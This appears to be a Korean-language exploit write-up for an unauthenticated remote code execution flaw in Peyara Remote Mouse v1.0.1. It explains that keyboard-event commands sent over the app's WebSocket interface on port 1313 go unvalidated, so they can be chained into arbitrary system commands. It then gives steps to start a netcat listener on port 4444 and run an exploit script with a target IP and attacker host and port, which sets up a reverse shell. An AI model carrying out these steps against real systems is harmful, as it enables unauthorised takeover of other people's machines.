
Peyara Remote Mouse v1.0.1- Remote Code Execution (RCE)
Peyara Remote Mouse v1.0.1은 WebSocket 명령 인터페이스(포트 1313)에 인증되지 않은 원격 코드 실행 취약점을 포함하고 있습니다. 애플리케이션이 WebSocket 연결을 통해 수신된 시뮬레이션 키보드 입력 명령을 검증하거나 삭제하지 않아, 공격자가 악의적인 키보드 이벤트를 연결하여 임의의 시스템 명령을 실행할 수 있습니다. 이 취약점은 인증 없이 원격에서 악용되어 전체 시스템을 장악할 수 있습니다.
취약한 애플리케이션 설치
대상 Windows 시스템에 Peyara Remote Mouse를 다운로드하여 설치합니다.
Netcat 리스너 시작
터미널을 열고 다음을 실행합니다:
nc -nlvp 4444
Exploit 스크립트 실행
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

